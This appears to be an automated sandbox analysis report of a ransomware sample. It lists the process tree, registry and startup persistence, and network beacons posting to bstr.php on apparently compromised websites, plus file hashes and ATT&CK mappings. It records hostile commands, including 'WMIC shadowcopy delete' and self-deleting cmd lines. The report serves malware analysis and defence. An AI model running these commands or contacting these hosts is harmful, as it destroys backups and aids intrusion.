wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System cdxnmauxndwm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" cdxnmauxndwm.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe"C:\Users\Admin\AppData\Local\Temp\e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Users\Admin\AppData\Local\Temp\e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe"C:\Users\Admin\AppData\Local\Temp\e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe"2⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\cdxnmauxndwm.exeC:\Windows\cdxnmauxndwm.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\cdxnmauxndwm.exeC:\Windows\cdxnmauxndwm.exe4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:5008 -
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT5⤵
- System Location Discovery: System Language Discovery
- Opens file in notepad (likely ransom note)
PID:4360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\RECOVERY.HTM5⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffdd7e46f8,0x7fffdd7e4708,0x7fffdd7e47186⤵PID:3632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15045793499681320551,730266638985055113,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:26⤵PID:3652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,15045793499681320551,730266638985055113,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:36⤵PID:4804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,15045793499681320551,730266638985055113,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2352 /prefetch:86⤵PID:4900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15045793499681320551,730266638985055113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:16⤵PID:4936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15045793499681320551,730266638985055113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:16⤵PID:3372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,15045793499681320551,730266638985055113,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 /prefetch:86⤵PID:3232
-
-
-
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Windows\CDXNMA~1.EXE5⤵
- System Location Discovery: System Language Discovery
PID:2256
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\AppData\Local\Temp\E3ED21~1.EXE3⤵
- System Location Discovery: System Language Discovery
PID:4432
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4792
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3292
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request13.86.106.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request0.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request167.173.78.104.in-addr.arpaIN PTRResponse167.173.78.104.in-addr.arpaIN PTRa104-78-173-167deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request241.150.49.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request56.163.245.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request241.42.69.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request21.49.80.91.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestbiocarbon.com.ecIN AResponsebiocarbon.com.ecIN A162.241.224.203
-
Remote address:162.241.224.203:80RequestPOST /wp-content/uploads/bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: biocarbon.com.ec
Content-Length: 645
Cache-Control: no-cache
ResponseHTTP/1.1 301 Moved Permanently
Server: nginx/1.25.5
Content-Type: text/html; charset=iso-8859-1
Content-Length: 242
Location: https://biocarbon.com.ec/403.shtml
X-Server-Cache: false
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
-
Remote address:8.8.8.8:53Request203.224.241.162.in-addr.arpaIN PTRResponse203.224.241.162.in-addr.arpaIN PTRbox5210bluehostcom
-
Remote address:162.241.224.203:443RequestGET /403.shtml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Cache-Control: no-cache
Host: biocarbon.com.ec
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: nginx/1.25.5
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://biocarbon.com.ec/wp-json/>; rel="https://api.w.org/"
Vary: Accept-Encoding
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
Transfer-Encoding: chunked
-
Remote address:8.8.8.8:53Requestr10.o.lencr.orgIN AResponser10.o.lencr.orgIN CNAMEo.lencr.edgesuite.neto.lencr.edgesuite.netIN CNAMEa1887.dscq.akamai.neta1887.dscq.akamai.netIN A88.221.135.105a1887.dscq.akamai.netIN A88.221.134.89
-
GEThttp://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgPdudvodJRcElz6vtmmu4TyWg%3D%3Dcdxnmauxndwm.exeRemote address:88.221.135.105:80RequestGET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgPdudvodJRcElz6vtmmu4TyWg%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: r10.o.lencr.org
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "EDBF6B39418DCF40055F1049DB26A0AAFD7B045BC5FBEB2E9E7D81474DBA565F"
Last-Modified: Tue, 21 Jan 2025 10:25:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21566
Expires: Tue, 21 Jan 2025 16:25:06 GMT
Date: Tue, 21 Jan 2025 10:25:40 GMT
Connection: keep-alive
-
Remote address:8.8.8.8:53Request168.245.100.95.in-addr.arpaIN PTRResponse168.245.100.95.in-addr.arpaIN PTRa95-100-245-168deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request105.135.221.88.in-addr.arpaIN PTRResponse105.135.221.88.in-addr.arpaIN PTRa88-221-135-105deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestimagescroll.comIN AResponse
-
Remote address:8.8.8.8:53Requestmusic.mbsaeger.comIN AResponse
-
Remote address:8.8.8.8:53Requeststacon.euIN AResponsestacon.euIN A85.128.128.104
-
Remote address:85.128.128.104:80RequestPOST /bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: stacon.eu
Content-Length: 645
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
X-CDN-nazwa.pl-location: AMS
X-CDN-nazwa.pl-policyused: cdn=1209600
Server: Apache/2
-
Remote address:8.8.8.8:53Requestsurrogacyandadoption.comIN AResponsesurrogacyandadoption.comIN CNAMEcomingsoon.namebright.comcomingsoon.namebright.comIN CNAMEcdl-lb-1356093980.us-east-1.elb.amazonaws.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comIN A54.85.129.208cdl-lb-1356093980.us-east-1.elb.amazonaws.comIN A34.193.158.132
-
Remote address:54.85.129.208:80RequestPOST /bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: surrogacyandadoption.com
Content-Length: 645
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestworldisonefamily.infoIN AResponseworldisonefamily.infoIN A104.155.138.21worldisonefamily.infoIN A107.178.223.183
-
Remote address:8.8.8.8:53Request104.128.128.85.in-addr.arpaIN PTRResponse104.128.128.85.in-addr.arpaIN PTRstatic-ajw104revnazwapl
-
Remote address:8.8.8.8:53Request208.129.85.54.in-addr.arpaIN PTRResponse208.129.85.54.in-addr.arpaIN PTRec2-54-85-129-208 compute-1 amazonawscom
-
Remote address:104.155.138.21:80RequestPOST /zz/libraries/bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: worldisonefamily.info
Content-Length: 645
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
-
Remote address:8.8.8.8:53Request21.138.155.104.in-addr.arpaIN PTRResponse21.138.155.104.in-addr.arpaIN PTR21138155104bcgoogleusercontentcom
-
Remote address:8.8.8.8:53Request60.153.16.2.in-addr.arpaIN PTRResponse60.153.16.2.in-addr.arpaIN PTRa2-16-153-60deploystaticakamaitechnologiescom
-
Remote address:162.241.224.203:80RequestPOST /wp-content/uploads/bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: biocarbon.com.ec
Content-Length: 645
Cache-Control: no-cache
ResponseHTTP/1.1 301 Moved Permanently
Server: nginx/1.25.5
Content-Type: text/html; charset=iso-8859-1
Content-Length: 242
Location: https://biocarbon.com.ec/403.shtml
X-Server-Cache: false
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
-
Remote address:162.241.224.203:443RequestGET /403.shtml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Cache-Control: no-cache
Host: biocarbon.com.ec
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: nginx/1.25.5
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://biocarbon.com.ec/wp-json/>; rel="https://api.w.org/"
Vary: Accept-Encoding
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
Transfer-Encoding: chunked
-
Remote address:8.8.8.8:53Request14.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestimagescroll.comIN AResponse
-
Remote address:8.8.8.8:53Requestmusic.mbsaeger.comIN AResponse
-
Remote address:85.128.128.104:80RequestPOST /bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: stacon.eu
Content-Length: 645
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
X-CDN-nazwa.pl-location: AMS
X-CDN-nazwa.pl-policyused: cdn=1209600
Server: Apache/2
-
Remote address:54.85.129.208:80RequestPOST /bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: surrogacyandadoption.com
Content-Length: 645
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:104.155.138.21:80RequestPOST /zz/libraries/bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: worldisonefamily.info
Content-Length: 645
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
-
1.2kB 725 B 6 5
HTTP Request
POST http://biocarbon.com.ec/wp-content/uploads/bstr.phpHTTP Response
301 -
2.4kB 44.4kB 41 37
HTTP Request
GET https://biocarbon.com.ec/403.shtmlHTTP Response
404 -
88.221.135.105:80http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgPdudvodJRcElz6vtmmu4TyWg%3D%3Dhttpcdxnmauxndwm.exe470 B 1.0kB 5 3
HTTP Request
GET http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgPdudvodJRcElz6vtmmu4TyWg%3D%3DHTTP Response
200 -
1.1kB 588 B 6 5
HTTP Request
POST http://stacon.eu/bstr.phpHTTP Response
200 -
1.6kB 13.3kB 16 13
HTTP Request
POST http://surrogacyandadoption.com/bstr.phpHTTP Response
200 -
1.2kB 250 B 6 5
HTTP Request
POST http://worldisonefamily.info/zz/libraries/bstr.phpHTTP Response
200 -
1.1kB 645 B 5 3
HTTP Request
POST http://biocarbon.com.ec/wp-content/uploads/bstr.phpHTTP Response
301 -
2.4kB 40.9kB 38 34
HTTP Request
GET https://biocarbon.com.ec/403.shtmlHTTP Response
404 -
1.1kB 508 B 5 3
HTTP Request
POST http://stacon.eu/bstr.phpHTTP Response
200 -
1.6kB 13.3kB 16 13
HTTP Request
POST http://surrogacyandadoption.com/bstr.phpHTTP Response
200 -
1.2kB 250 B 7 5
HTTP Request
POST http://worldisonefamily.info/zz/libraries/bstr.phpHTTP Response
200
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
13.86.106.20.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
0.159.190.20.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
167.173.78.104.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
241.150.49.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
56.163.245.4.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
241.42.69.40.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
70 B 145 B 1 1
DNS Request
21.49.80.91.in-addr.arpa
-
62 B 78 B 1 1
DNS Request
biocarbon.com.ec
DNS Response
162.241.224.203
-
74 B 108 B 1 1
DNS Request
203.224.241.162.in-addr.arpa
-
61 B 160 B 1 1
DNS Request
r10.o.lencr.org
DNS Response
88.221.135.10588.221.134.89
-
73 B 139 B 1 1
DNS Request
168.245.100.95.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
105.135.221.88.in-addr.arpa
-
61 B 134 B 1 1
DNS Request
imagescroll.com
-
64 B 145 B 1 1
DNS Request
music.mbsaeger.com
-
55 B 71 B 1 1
DNS Request
stacon.eu
DNS Response
85.128.128.104
-
70 B 194 B 1 1
DNS Request
surrogacyandadoption.com
DNS Response
54.85.129.20834.193.158.132
-
67 B 99 B 1 1
DNS Request
worldisonefamily.info
DNS Response
104.155.138.21107.178.223.183
-
73 B 113 B 1 1
DNS Request
104.128.128.85.in-addr.arpa
-
72 B 127 B 1 1
DNS Request
208.129.85.54.in-addr.arpa
-
73 B 126 B 1 1
DNS Request
21.138.155.104.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
60.153.16.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
14.160.190.20.in-addr.arpa
-
61 B 134 B 1 1
DNS Request
imagescroll.com
-
64 B 145 B 1 1
DNS Request
music.mbsaeger.com
-
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9KB
MD51b78b85e42aed2f4e8159decab1ec819
SHA1479f4d30be894ba9495d270094290f7bcff94f84
SHA256b1bdc33175adff6089400d64922e47808f9b59181a6fe69504a48e9e71ab83ef
SHA512c3f30a3e21d0c7cccf8e123774caef96b2328eda6e99bb37c84f8a9652ecc20ab96124f69b214dd29c9801a0c2ca3cb53662f2f93d68fa102a45a5b927f9c7d8
-
Filesize
63KB
MD514b1317ab0dc245f3d4442c108ddaaf1
SHA107a562b5b2db6be1d282e17c7b3d5d1077542572
SHA256f0eb1c3c0f67119764d8fa98a355b934ef015e78e075bc56975a5d72be2faa60
SHA51224ef58d032cb9ad974eaab240554ce815cd27b59f07ee6d4a6fbdce6b2fff4d87fa7c74b686a0bfe999a675a1974b988af01fa3450460427fda915f43031b67b
-
Filesize
1KB
MD5bfc580ab1e9f663c55ce4c0d6ac785fc
SHA1559d268a13a5b6b1f484323685fac4e58d8b5a65
SHA256f05afa6bd494fe218279450670b5007cefa3d4a3ce34818d9551f6e80f8c9efb
SHA512d2c18e8e8a9a649352e87edb23edede5ea9c2bea03acad3cc8e88dd23d6b9ebdf912a6f19ddf86dcf9702250aab6288d7fdb325cd619553f8a297aa23034a086
-
Filesize
560B
MD5dfea4a0ebadf07521723b12dbe809df7
SHA168b95f34bc8666bca44c695ce596625b82b0e05e
SHA2569d4fbf692ebc6f8f204e0f3ea4943cde541c012e9308adf7db29202912394e8e
SHA5121441c86b03e1ffbf19ada0b5f961a2df814f75c11589a82066cd03878b5a6f4015f07c7c6aeafcf0720aba0e4dee9dc13c8b38d453914b9c37eaacd6488bd4f1
-
Filesize
560B
MD55c00129a490f1c59b3aa9d45674fa9d6
SHA1b74981401059188e80a62c59ab9ad2fcad912aff
SHA256e7eead0d6a49c89331d20302cb5e13fd6975f95c8dc489590101bd13bb8ba1bc
SHA5124e5f5177520a9d1e6b3c8dda960c9d0f6b706d99a35cc27296d232a7675d81fd9387f1f10ced245e7b4e4cf1ae679d3fb24086a0f2da3638e64afd7a0325d9b3
-
Filesize
416B
MD5611993ae6f2843abe00011331578c44a
SHA18c211e333b508badb8f2ca4845adae2af25f5bca
SHA256792e259bb12f658e3d041659de1112df4fece3a535235b6d475973096905e2be
SHA512f739552c80b4bdbb8ece99917657d00c26ed880904aaec2c9a852aec952e4ac59de62076bc60e97986e1ca69aa298c815a68794e152b4e6eec901ce838104fb0
-
Filesize
152B
MD5d22073dea53e79d9b824f27ac5e9813e
SHA16d8a7281241248431a1571e6ddc55798b01fa961
SHA25686713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6
SHA51297152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413
-
Filesize
152B
MD5bffcefacce25cd03f3d5c9446ddb903d
SHA18923f84aa86db316d2f5c122fe3874bbe26f3bab
SHA25623e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405
SHA512761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7
-
Filesize
5KB
MD5e8adf384a640023017e67ce46b96cf5e
SHA19be592237283c3f115d8482a83bcdc22e33a6b85
SHA256e309d7d151000a1c0659050408809186159f6055d72363d18b23a270aa36ca36
SHA512e18d234c8346c0d9b319c1a07be528e168b46b27b913ae40eea0b7c4b371f973cde5dbc09814786b99eef06c07840441227ae2dd49dc566bd3877c3cf7fc0ac0
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727662192103813.txt
Filesize77KB
MD50089a10fcb5c08347469b9ff8736d05b
SHA1969d1e17cd9812c0bb6063f584d61ca4a0567126
SHA256236b55b1d09b2bfe5d42685ba0b6c307fe07edb13a28c5f06184221245a2b7aa
SHA51207314b52068012e8e5bb52a7ca8c3c7158259b85f4fc6fe689fe850f0258ecdfac398befcd81e90a2d97d952e859452680bc3a7ab6a99e556f55d6d4e24cdb7c
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727663401899668.txt
Filesize47KB
MD5a8ebbc8426d2a55cb7e6ba84d986bd7d
SHA1336fd816759f420b530b60aa9f85fa97f894c4f9
SHA256bbf141633400dc69c1314839522cc9fbbfefa235cf6e7ab33d7ab23c9964ad15
SHA5123235f5bc5c7469ec83f47b2d0cd1a0a8e4fd418f1059862b5d74b1f649ee314f3f32a526a50cf02c0f1984eaf34b533b4e2e2bc23146d8b5d8c1908b86b9c0a8
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727670771168387.txt
Filesize74KB
MD5ca7ac5999ce50bb1bcbed911ef3351ed
SHA1f3ba96187e6669e8e83d7fb5d501492c7e43dbbb
SHA25658d9231755940e78c409c53c46a3ae92409478bb8d4a2458129f1bbf3d8354b0
SHA51252bcdfccf3040e8723ae5288d11962a25ba5722ccbc8530f9917d3468f50d55674b3bc03d3dee0daf761e1a19da175c1c7869b59ac263776b4cdf4cf6ec6bd45
-
Filesize
371KB
MD5c192a273a786b569df2056914faf8327
SHA187f24f470d678deae2cade1d3fd12255e796c091
SHA256e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced
SHA5128e036f23c66fbd545fd03aba423a47bf422cee52204fc3a2fb2682fd00a31c2f3e6dc982d01fa30ab2f8ba0b3463a763e403b212f00fe9488b2791dd03629427